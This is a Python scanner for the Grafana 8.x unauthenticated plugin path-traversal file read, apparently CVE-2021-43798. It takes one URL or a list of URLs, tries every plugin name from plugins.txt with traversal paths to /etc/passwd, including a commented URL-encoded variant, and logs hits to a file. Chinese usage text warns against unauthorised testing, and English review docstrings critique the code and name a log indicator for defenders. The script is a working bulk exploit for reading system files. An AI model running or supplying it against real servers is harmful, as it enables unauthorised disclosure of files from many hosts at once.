import requests
import sys
import re
# NOTE(review): this string is not a module docstring — it follows the imports, so it
# is a plain expression statement with no effect. Move it above the imports (or make
# it a comment) if it is meant to be picked up by help()/__doc__ tooling.
'''
请熟读网络安全法,禁止做非授权渗透测试
本工具具有单IP检测与多IP检测两种检测方式,每个URL通过枚举多个插件进行检测
插件通过加载plugins.txt进行,可自行添加删减
用法:
通过-u 指定URL
通过-f 指定文件
'''
def check(url):
    """Probe one Grafana base URL for the unauthenticated plugin path-traversal read.

    For every plugin name listed in ``plugins.txt`` (one per line, opened relative to
    the current working directory) a POST is sent to
    ``<url>/public/plugins/<plugin>/../../../../../../../../../../../etc/passwd``.
    A response body containing the substring ``root`` is reported as a hit and the
    probing URL is appended to ``grafana 8.x_fileread_vuln.txt``; any other response
    is reported as not vulnerable.

    Args:
        url: base URL of the target, e.g. ``http://127.0.0.1:3000``. It is joined with
            a literal leading ``/``, so a trailing slash on ``url`` yields ``//``.

    Returns:
        None. Results are reported via stdout and the result file only.

    Notes (review):
        * ``'root' in a`` is a loose indicator: any response that happens to contain
          the word "root" (error pages, HTML) is reported as vulnerable.
        * The bare ``except:`` hides the actual failure (connection error, timeout,
          error while writing the result file, even KeyboardInterrupt) behind a
          generic "request error" line.
        * Opening ``plugins.txt`` is outside the ``try``, so a missing file raises
          to the caller.
        * For defenders: these requests are visible in the access log as
          ``/public/plugins/<name>/../`` paths with repeated traversal segments.
    """
    with open("plugins.txt", 'r') as f:
        for plugins in f.readlines():
            # str.rstrip() drops the trailing newline (and other whitespace) of the line.
            url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/../../../../../../../../../../../etc/passwd"
            # Alternative encoded payload intended for a reverse-proxy front end (disabled).
            #url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
            header = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
            }
            try:
                # timeout=(connect, read) in seconds.
                req = requests.post(url1, headers=header,timeout=(3,7))
                a=req.text
                if 'root' in a:
                    print(url+' '+'存在'+str.rstrip(plugins)+'插件,并存在漏洞!')
                    # The result file is opened in append mode once per hit.
                    with open('grafana 8.x_fileread_vuln.txt', 'a+') as ff:
                        ff.write(url1 + '\n')
                else:
                    print(url+' '+str.rstrip(plugins)+' '+'不存在漏洞!')
            except:
                # Catches everything, including KeyboardInterrupt; the cause is lost.
                print('[-]请求错误')
def file_check(files):
    """Run the same probe as ``check`` for every base URL listed in a text file.

    ``files`` is read line by line; each line, with ``\\n`` removed, is used as the
    base URL. The loop body duplicates ``check`` (same request, same ``'root'``
    heuristic, same result file ``grafana 8.x_fileread_vuln.txt``).

    Args:
        files: path of a text file containing one base URL per line.

    Returns:
        None. Results are reported via stdout and the result file only.

    Notes (review):
        * The inner ``with open("plugins.txt", 'r') as f`` rebinds ``f`` while the
          outer loop is running. It works only because ``f.readlines()`` already
          materialised the URL list; the outer file is still closed by its own
          ``with``, but the name reuse is fragile.
        * ``url.replace('\\n','')`` runs on every plugin iteration instead of once per
          URL, and a URL line is skipped entirely if ``plugins.txt`` is empty.
        * The whole body could be ``check(url.replace('\\n',''))``.
        * A missing ``files`` or ``plugins.txt`` raises outside the ``try`` to the caller.
    """
    with open(files, 'r') as f:
        for url in f.readlines():
            with open("plugins.txt", 'r') as f:
                for plugins in f.readlines():
                    # Strip the line terminator of the URL line (repeated per plugin).
                    url =url.replace('\n','')
                    url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/../../../../../../../../../../../etc/passwd"
                    # Alternative encoded payload intended for a reverse-proxy front end (disabled).
                    #url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
                    header = {
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
                    }
                    try:
                        # timeout=(connect, read) in seconds.
                        req = requests.post(url1, headers=header,timeout=(3,7))
                        a=req.text
                        if 'root' in a:
                            print(url+' '+'存在'+str.rstrip(plugins)+'插件,并存在漏洞!')
                            with open('grafana 8.x_fileread_vuln.txt', 'a+') as ff:
                                ff.write(url1 + '\n')
                        else:
                            print(url+' '+str.rstrip(plugins)+' '+'不存在漏洞!')
                    except:
                        # Catches everything, including KeyboardInterrupt; the cause is lost.
                        print('[-]请求错误')
def help():
    """Print the command-line usage summary (one line per option) to stdout.

    Note: this shadows the builtin ``help`` for the module.
    """
    usage_lines = (
        ' ',
        '[+] python3 grafana_fileread.py -h 查看帮助 ',
        '[+] python3 grafana_fileread.py -u http://127.0.0.1:3000 验证单个URL ',
        '[+] python3 grafana_fileread.py -f file.txt 批量验证URL ',
    )
    for line in usage_lines:
        print(line)
if __name__=="__main__":
    # Minimal positional-argument dispatch on sys.argv[1]; no argparse.
    try:
        print('')
        cmd1 = sys.argv[1]
        if cmd1 == '-h':
            help()
        elif cmd1 == '-u':
            cmd2 = sys.argv[2]  # single base URL
            check(cmd2)
        elif cmd1 == '-f':
            cmd2 = sys.argv[2]  # text file with one base URL per line
            file_check(cmd2)
        else:
            print('[-]请输入正确的参数,或者-h查看帮助')
    except:
        # Bare except: a missing argument (IndexError) lands here, but so does any
        # error escaping check()/file_check() — e.g. a missing plugins.txt or input
        # file — and KeyboardInterrupt. All are reported as the same usage hint.
        print('[-]请输入-h查看帮助')